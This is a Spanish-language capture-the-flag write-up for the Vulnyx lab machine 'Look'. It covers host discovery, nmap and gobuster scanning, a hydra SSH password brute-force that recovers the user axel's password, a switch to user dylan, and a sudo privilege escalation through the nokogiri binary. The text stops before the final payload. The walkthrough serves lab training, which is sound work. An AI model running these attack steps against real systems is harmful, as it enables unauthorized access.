Máquina Look (Vulnyx)
Comenzamos con averiguar la dirección Ip de la Máquina Víctima, para ello utilizaremos la herramienta netdiscover, para ello ejecutamos el siguiente comando:
$ netdiscover -i eth1 -r 10.0.2.0/24
- Kali (Máquina Atacante): 10.0.2.4
- Máquina Víctima: 10.0.2.23
Comprobamos si tenemos conexión con la Máquina Víctima, para ello ejecutamos el siguiente comando:
$ ping -c 1 10.0.2.23
Como se puede comprobar por el TTL nos enfrentamos a una Máquina Linux.
A continuación, realizamos con la herramienta nmap un reconocimiento de los servicios, para ello
ejecutamos el siguiente comando:
$ nmap -Pn 10.0.2.23 -sVC
Como podemos comprobar la Máquina Víctima tiene abierto el puerto 22 y 80.
Comprobamos que es lo que corre en el puerto 80.
A continuación, realizamos con la herramienta gobuster un fuzzing web por extensiones de archivos .php, para ello ejecutamos el siguiente comando:
$ gobuster dir -u http://10.0.2.9:80 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -x php
Encontramos el archivo info.php.
Accedemos a este archivo.
Y observamos el usuario axel.
Con la ayuda de la herramienta hydra, realizamos un ataque a ssh para intentar crackear la contraseña del usuario Axel, para ello ejecutamos el siguiente comando:
$ hydra -l axel -P rockyou.txt ssh://10.0.2.23 -T 64 -I
Y obtenemos la contraseña bambam.
A continuación, nos conectamos por ssh, para ello ejecutamos el siguiente comando:
$ ssh axel@10.0.2.23
Consultamos todas las variables de entorno definidas en el sistema, para ello ejecutamos el siguiente comando:
$ env
Nos convertimos en el usuario dylan, para ello ejecutamos el siguiente comando:
$ su dylan
Enumeramos los permisos sudo, para ello ejecutamos el siguiente comando:
$ sudo -l
Nos encontramos con el binario nokogiri que lo podemos ejecutar como el usuario root, investigando un poco sobre nokogiri veo que utiliza IRB, un interprete interactivo de Ruby el cual permite ejecutar comandos con funciones como exec, por lo tanto nos vamos a la pagina gtfobins a mirar el payload.
La ejecutamos de la siguiente manera:
$ sudo -u root /usr/bin/nokogiri /etc/passwd











